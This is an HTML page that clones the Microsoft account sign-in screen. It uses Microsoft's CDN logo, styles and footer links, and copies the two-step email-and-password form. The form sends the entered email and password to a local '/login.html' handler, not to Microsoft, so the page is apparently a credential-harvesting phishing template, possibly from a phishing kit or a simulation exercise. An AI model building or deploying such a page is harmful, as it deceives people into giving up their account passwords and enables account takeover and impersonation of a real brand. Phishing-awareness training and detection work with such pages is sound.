<html>
    <head>
        <title>Sign in to your account</title>
        <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ltjvsvk5aekta_kgibi0gg2.css" rel="stylesheet">
        <link href="/static/style.css" rel="stylesheet">
        <link rel="shortcut icon" href="https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    </head>
    <body class="cb">
        <div id="backgroundImage" role="img" class="background-image ext-background-image" style="background-image: url(&quot;https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg&quot;);"></div>
        <form id="loginform" style="display: inline" action="/login.html" method="POST">
        <div class="outer">
            <div class="template-section main-section">
                <div  class="middle ext-middle">
                    <div class="full-height">
                        <div id="lightbox" class="sign-in-box ext-sign-in-box has-popup">
                            <div>
                                <img class="logo" pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png" svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg">
                            </div>
                            <div id="login-div" class="login">
                                <div>
                                    <div class="row title ext-title" id="loginHeader">
                                        <div role="heading" aria-level="1" >Sign in</div>
                                    </div>
                                </div>
                                <div class="form-group col-md-24">
                                    <input autofocus type="email" name="login" id="i0116" maxlength="113" class="form-control ltr_override input ext-input text-box ext-text-box" placeholder="Email, phone or Skype">                                    
                                </div>
                                <div class="position-buttons password-reset-links-container ext-password-reset-links-container">
                                    <div class="row">
                                        <div class="cod-md-24">
                                            <div class="text-13">
                                                <div class="form-group">No account&nbsp;? <a href="https://login.live.com/">Create one&nbsp;!</a></div>
                                                <div class="form-group">
                                                    <a id="cantAccessAccount" name="cannotAccessAccount"  href="#">Can’t access your account&nbsp;?</a>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container">
                                    <div class="inline-block button-item ext-button-item" onclick="next()">
                                        <input id="next" class="win-button button_primary button ext-button primary ext-primary" value="Next">
                                    </div>
                                </div>
                            </div>
                            <div id="password-div" class="password" hidden>
                                <div class="identityBanner">
                                    <div class="backButton">
                                        <img role="presentation" pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_d1229aefd268f350621d48f094122f69.png" svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.svg" src="https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.svg">
                                    </div>
                                    <div id="displayName" class="identiy">
                                        xxx
                                    </div>
                                </div>
                                <div>
                                    <div class="row title ext-title" id="loginHeader">
                                        <div role="heading" aria-level="1" >Enter password</div>
                                    </div>
                                </div>
                                <div class="form-group col-md-24">
                                    <input id= "password-input" type="password" name="password" class="form-control ltr_override input ext-input text-box ext-text-box" placeholder="Password">
                                </div>
                                <div class="position-buttons password-reset-links-container ext-password-reset-links-container">
                                    <div class="row">
                                        <div class="cod-md-24">
                                            <div class="text-13">
                                                <div class="form-group"><a href="https://login.live.com/">Forgot my password</a></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container">
                                    <div class="inline-block button-item ext-button-item">
                                        <input type="submit" id="login" class="win-button button_primary button ext-button primary ext-primary" value="Sign in">
                                    </div>    
                                </div>    
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>                            
        </form>
        <div id="footer" role="contentinfo" class="footer ext-footer">
            <div id="footerLinks" class="footerNode text-secondary footer-links ext-footer-links">
                <a id="ftrTerms" href="https://www.microsoft.com/fr-FR/servicesagreement/" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use </a>
                <a id="ftrPrivacy"href="https://privacy.microsoft.com/fr-FR/privacystatement" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy & cookies</a>
                <a id="moreOptions" href="#" role="button" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
            </div>
        </div>
        <script src="/static/script.js"></script>
    </body>
</html>